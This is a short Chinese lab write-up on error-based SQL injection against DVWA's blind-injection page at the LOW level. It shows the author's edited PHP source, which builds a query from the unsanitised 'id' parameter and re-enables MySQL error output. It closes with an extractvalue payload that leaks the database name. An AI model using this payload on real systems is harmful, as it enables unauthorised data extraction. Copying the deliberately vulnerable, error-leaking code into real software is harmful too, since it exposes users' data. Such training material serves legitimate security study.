DVWA盲注之报错注入
实验等级为LOW级别
在报错注入中,发现高版本的dvwa并不会跳转出报错内容
我们输入1’ 只会告诉我们这个参数不正确
此时我们使用报错函数也没有用,只能做出exist or missing的判断
但是我们发现只需要修改对应的脚本内容,即可实现报错函数的利用,顺利爆出数据
修改后的脚本如下:
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Get input
$id = $_GET[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
//$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
$html .= '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
$html .= '<pre>User ID is MISSING from the database.</pre>';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
修改之后,我们就能够很快找到注入点
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
执行报错函数就能够爆出数据内容
1' and extractvalue(rand(),concat(0x3e,database()))#